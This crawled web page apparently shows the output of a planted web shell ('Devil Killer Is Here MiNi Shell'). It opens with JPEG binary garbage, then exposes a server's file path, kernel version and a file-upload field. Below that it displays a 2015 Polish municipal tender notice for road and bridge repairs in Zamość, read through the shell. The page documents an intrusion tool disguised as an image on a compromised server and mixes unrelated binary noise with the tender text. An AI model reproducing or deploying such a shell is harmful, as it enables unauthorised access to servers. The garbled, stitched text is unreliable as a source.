JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150319/62068-N-2015.html

<p class="kh_header"><b>Zamość: REMONT NAWIERZCHNI ROZBIERALNYCH ULIC I CHODNIKÓW, REMONT NAWIERZCHNI BITUMICZNYCH , BIEŻĄCE UTRZYMANIE OBIEKTÓW MOSTOWYCH  NA TERENIE MIASTA ZAMOŚĆ W 2015 R.</b><br>
<b>Numer ogłoszenia: 62068 - 2015; data zamieszczenia: 19.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Grodzkich  w Zamościu , ul. Partyzantów 61, 22-400 Zamość, woj. lubelskie, tel. 084 6383198, faks 084 6396189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdg.zamosc.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT NAWIERZCHNI ROZBIERALNYCH ULIC I CHODNIKÓW, REMONT NAWIERZCHNI BITUMICZNYCH , BIEŻĄCE UTRZYMANIE OBIEKTÓW MOSTOWYCH  NA TERENIE MIASTA ZAMOŚĆ W 2015 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są remonty nawierzchni  rozbieralnych ulic i chodników, remonty nawierzchni bitumicznych masą na gorąco , bieżące utrzymanie obiektów mostowych  na terenie miasta Zamość w 2015 r.

Zamówienie podzielono na 3 części:

Przedmiotem zamówienia części 1 są roboty budowlane polegające na remoncie nawierzchni rozbieralnych ulic i chodników na terenie miasta Zamość w 2015 r.
W ramach przedmiotu zamówienia są do wykonania niżej wymienione roboty budowlane remontu nawierzchni rozbieralnych ulic i chodników:

1)Wykonanie koryta gł. do 10cm w gruncie kat. III-IV,
2)Wykonanie koryta w gruncie kat. III-IV za każde dalsze 5cm głębokości,
3)W-wy odsączające zagęszczane mechanicznie, grubość w-wy po zagęszczeniu  do 10cm,
4)w-wy odsączające zagęszczane mechanicznie, za dalszy 1cm grubości w-wy,
5)Podsypka z piasku gr. 3cm,
6)Podsypka cem.- piaskowa gr. 3cm,
7)Wyrównanie zaniżeń nawierzchni materiałem kamiennym,
8)Wyrównanie zaniżeń nawierzchni materiałem kamiennym ( materiał zamawiającego),
9)Podbudowa z tłucznia z zagęszczeniem mechanicznym, 0/31,5mm, gr. w-wy do 10cm,
10)Podbudowa z tłucznia z zagęszczeniem mechanicznym, za każdy dalszy 1cm,
11) Ustawienie obrzeży betonowych 20x6 na podsypce cementowo- piaskowej,
12)Ustawienie krawężników betonowych 15x30 na podsypce cementowo-piaskowej ( krawężnik z rozbiórki),
13)Ustawienie krawężników betonowych 20x30 na podsypce cementowo-piaskowej ( krawężnik z rozbiórki),
14)Ustawienie krawężników betonowych 15x30 na podsypce cementowo-piaskowej,
15)Ustawienie krawężników betonowych 20x30 na podsypce cementowo-piasowej,
16)Rozebranie krawężników betonowych 15x30 na podsypce piaskowej,
17)Rozebranie krawężników betonowych 20x30 na podsypce piaskowej,
18)Rozebranie obrzeży betonowych 20x6 na podsypce piaskowej,
19)Rozebranie nawierzchni z płyt betonowych 35x35x5,
20)Rozebranie nawierzchni z mieszanek min-bitum. gr.4cm,
21)Ławy pod krawężniki - ława betonowa z oporem,
22)Rozebranie podbudowy betonowej gr 15cm,
23)Rozebranie ław pod krawężniki z betonu,
24)Chodniki z kostki brukowej betonowej  gr. 6cm na podsypce cementowo-piaskowej,
25)Nawierzchnie  z kostki brukowej  gr. 8cm na podsypce cementowo-piask.,
26)Nawierzchnie z płyt drogowych betonowych pełnych o pow. 1 szt. płyty do 3m2,
27)Remont nawierzchni z płyt35x35x5 na podsypce cementowo-piaskowej,
28)Remont nawierzchni z klinkieru układanego na rąb na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem:
 - klinkier z rozbiórki
- klinkier nowy,
29) Remont nawierzchni z trylinki z wypełnieniem spoin piaskiem,
30) Regulacja pionowa studzienek dla urządzeń podziemnych, kratki ściekowe,
31) Transport materiałów z rozbiórki na odl. do 5km z załadunkiem i rozładunkiem,
32) Mechaniczne profilowanie nawierzchni dróg gruntowych z zagęszczeniem w miarę potrzeb,
33) Mechaniczne  ścinanie poboczy o gr. 25cm z odwiezieniem na odl. do 3km.
34) Rozebranie nawierzchni z klinkieru drogowego na podsypce piaskowej,
35) Wyrównanie istniejącej podbudowy stabilizacją cementowo- piaskową z zagęszczeniem mechanicznym-
36) Wywóz gruzu rozbiórki i dowóz klinkieru pojazdami samowyładowczymi na odległość do 0,5km z załadunkiem
37) Dodatek do tabl. 1510 za transport na każde dalsze 0.5 km Krotność = 9,
38) Oczyszczenie klinkieru z rozbiórki do użytku,
39) Nawierzchnia z klinkieru drogowego układanego na rąb na podsypce nowej cementowo- piaskowej, 
Szczegółowy zakres robót  określony został w  przedmiarze robót stanowiącym załącznik nr 8 - cz.nr1  do SIWZ.

Przedmiotem zamówienia części 2 są roboty budowlane polegające na remoncie nawierzchni bitumicznych masą na gorąco dróg na terenie miasta Zamość 2015r. 
Przedmiotem zamówienia jest remont nawierzchni bitumicznych masą na gorąco dróg na terenie miasta:
Zamówienie obejmuje wykonanie niżej wymienionych robót:
1.Frezowanie nawierzchni przy gr. 4cm z transportem do 5km na terenie miasta Zamość,
2.Remont cząstkowy nawierzchni betonem asfaltowym:
- z mechanicznym ramowaniem,
- z wykonaniem ramowania frezarką
- nakładki o pow. remontu ponad 100 m2

Szczegółowy zakres robót  określony został w  przedmiarze robót stanowiącym załącznik nr 8 cz. nr 2  do SIWZ.


Przedmiotem zamówienia części 3 jest bieżące utrzymanie obiektów mostowych na terenie miasta Zamość w 2015 r.
W ramach przedmiotu zamówienia są do wykonania niżej wymienione roboty bieżącego utrzymania . 
1.Obiekt mostowy ul. Męczenników Rotundy- (JNI 01024958).
Lokalne naprawy belki podporęczowej zaprawą typu PCC. 
Regulacja istniejących płyt ażurowych.
2. Obiekt mostowy ul. Okrzei (JNI 01024959).
Uzupełnienie mat. kamiennego między palisadą a obiektem.
3. Obiekt mostowy ul. Szczebrzeska (JNI - 01024960)
Uzupełnienie skarp pod obiektem(gruzem). 
Uzupełnienie ziemi pod obiektem.
4. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024956).
Belka podporęczowa- skucie betonu, oczyszczenie. 
Belka podporęczowa- lokalne naprawy ubytków zaprawą PCC. 
Uzupełnienie gruntu pod obiektem.
Rozbiórka i ponowne ułożenie krat(ażury). Oczyszczenie nurtu rzeki.
5. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024956).
Belka podporęczowa- lokalne naprawy ubytków zaprawą PCC. 
Czyszczenie powierzchni betonowych spodu pomostu z odtworzeniem powłoki betonowej.
6. Obiekt mostowy ul. Sienkiewicza (JNI 01024953).
Ścianki stalowe GZ  długości elementów 4 m. 
Ponowne ułożenie płyt ażurowych- istniejące płyty z koryta rzeki. 
Belka podporęczowa lokalne naprawy betonem PCC. 
Oczyszczenie nurtu rzeki. 
Uzupełnienie gruntu pod obiektem.
7. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024955).
Belki podporęczowe - oczyścić powierzchnie zacieków, zabezpieczyć. 
Wymiana szczebli pionowych w poręczy.
8. Obiekt mostowy ul. Sadowa (JNI 01024950).
Oczyścić i zabezpieczyć antykorozyjnie blachy na oczepach. 
Naprawa poręczy. 
Oczyszczenie metodą strumieniowo- ścierną powierzchni pionowych ustroju nośnego i belki podporęczowej. 
Belka podporęczowa - lokalne naprawy betonem PCC. 
Zabezpieczenie antykorozyjne pow. betonowych belki podporęczowej i pow. pionowych ustroju nośnego.
9.Obiekt mostowy ul. Lipska (JNI 01024592).
Udrożnić wpusty na obiekcie. 
Naprawa chodników z nawierzchni epoksydowo - poliuretanowej. 
Konserwacja łożysk- oczyścić , zabezpieczyć antykorozyjnie. 
Dźwigary główne- oczyścić i zabezpieczyć (końcówki). 
Dźwigary główne, skrajne- oczyścić i zabezpieczyć.
10.Obiekt mostowy ul. Dzieci Zamojszczyzny przy ul. Okrzei (JNI 01024957)
Oczyszczenie koryta nurtu rzeki. 
Założenie blach dylatacyjnych (2,5x0,2m) z oczyszczenie dylatacji z zanieczyszczeń. 
Belka podporęczowa, skrzydełka - lokalne naprawy betonem PCC.
11.Obiekt mostowy ul. Al. 1-go Maja  (JNI 01024954).
Uszczelnienie dylatacji na belce podporęczowej materiałem elastycznym (0,6x4). 
Oczyszczenie i zabezpieczenie antykorozyjne kotew z uzupełnieniem nakładek zabezpieczających. 
Wymiana uszkodzonej bariery SP-06.
12. Obiekt mostowy ul. Dzieci Zamojszczyzny strona lewa (JNI 01024949).
Przecięcie i wykucie dylatacji pionowej pomiędzy ustrojem nośnym a przyczółkiem. 
Wykonanie iniekcji rys przyczółka(4x0,7).
13. Obiekt mostowy ul. Dzieci Zamojszczyzny strona prawa (JNI 01024948).
Przecięcie i wykucie dylatacji pionowej pomiędzy ustrojem nośnym a przyczółkiem.
Wykonanie iniekcji rys przyczółka(4x0,65). 
Gzyms str. południowa - skucie betonu uzupełnienie zbrojenia i odbudowanie.
14. Wiadukt w ciągu ul. Wyszyńskiego (JNI 01024947).
Oczyścić powierzchnie przyczółków z zacieków i graffiti na wys. do 6m.
15. Kładka dla pieszych na ulicy Zamoyskiego ( JNI  31000342).
Oczyszczenie i zabezpieczenie antykorozyjne.
Szczegółowy zakres robot opisany jest w przedmiarze robót stanowiącym załącznik nr 8 cz. nr 3  do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.11.19-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości : 
a) dla części nr 1 -   3000,00 zł ( słownie: trzy tysiące zł),
b) dla części nr 2 -   6000,00 zł ( słownie: osiem tysięcy zł),
c) dla części nr 3 -  wadium nie jest wymagane,</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia , określone w art.22 ust.1 ustawy Pzp - według wzoru - zał. nr 1 do SIWZ,
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą  spełnia  nie spełnia,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy
 i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia - według wzoru - zał. nr 1 do SIWZ  i wykaże, że :

dla części nr 1 :  w okresie ostatnich 5 lat ( 2010-14) przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył ) należycie co najmniej :
- dwie roboty polegające na budowie , przebudowie lub remoncie drogi o nawierzchni z betonowej kostki brukowej o długości minimum 0,2 km.
 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie wykazują spełnianie warunku dotyczącego posiadania wiedzy i doświadczenia.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia   nie spełnia  .


dla części  nr 2 :  w okresie ostatnich 5 lat ( 2010-14) przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył ) co najmniej:
- dwie roboty polegające na budowie, przebudowie lub remoncie drogi z nawierzchni bitumicznej o długości minimum 0,5 km.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie wykazują spełnianie warunku dotyczącego posiadania wiedzy i doświadczenia.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą  spełnia , nie spełnia .

dla części nr 3 : 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat ( 2010-2014) a jeżeli ten okres prowadzenia działalności jest krótszy - w tym okresie  , wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył  co najmniej jedno zamówienie porównywalne z przedmiotem zamówienia. Za zamówienie odpowiadające przedmiotowi zamówienia Zamawiający uzna robotę budowlaną, polegającą na wykonaniu remontów mostów, wiaduktów
 o wartości nie mniejszej niż: 50 000,00 zł brutto  oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie wykazują spełnianie warunku dotyczącego posiadania wiedzy i doświadczenia.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą  spełnia  , nie spełnia .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania lub dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia  - według wzoru - zał. nr 1 do SIWZ  i wykaże, że posiada lub dysponuje odpowiednim do rodzaju robót potencjałem technicznym - według wzoru - zał. nr 4 do SIWZ,
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie wykazują spełnianie warunku dotyczącego dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą  spełnia , nie spełnia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, że Wykonawca spełnia warunek dotyczący dysponowania potencjałem kadrowym, jeśli wskaże osobę ,która będzie uczestniczyć w wykonaniu zamówienia , legitymująca się kwalifikacjami zawodowymi i doświadczeniem odpowiednik do funkcji jaka zostanie jej powierzona.
Doświadczenie zawodowe:
dla części nr 1 :  Kierownik Budowy powinien mieć uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej oraz doświadczenie w kierowaniu budową przy realizacji co najmniej 1 roboty budowlanej związanej z budową , przebudową , remontem drogi  o nawierzchni z betonowej kostki brukowej o długości minimum 0,2 km.

dla części nr 2 :  Kierownik Budowy powinien mieć uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej oraz doświadczenie w kierowaniu budową przy realizacji co najmniej 1 roboty budowlanej związanej z budową,  przebudową , remontem drogi  o drogi z nawierzchni bitumicznej o długości minimum 0,5 km.

dla części nr 3 :  Kierownik Budowy powinien mieć uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej  oraz doświadczenie w kierowaniu budową przy realizacji co najmniej 1 roboty budowlanej związanej z budową , przebudową ,  remontem mostów   
polegającą na wykonaniu remontów mostów, wiaduktów  o wartości nie mniejszej niż: 50 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia oraz przedstawi polisę lub inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.                                                                                                      Ocena spełnienia w/w warunku wg: 
a) oświadczenia wykonawcy ,
b) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .
Wykonawca wykaże, że posiada opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z podmiotem zamówienia:
dla części nr 1 - w wysokości co najmniej 100000,00 zł,
dla części nr 2 - w wysokości co najmniej 300000,00 zł,
dla części nr 3 - w wysokości co najmniej   50000,00 zł,

Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia , nie spełnia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

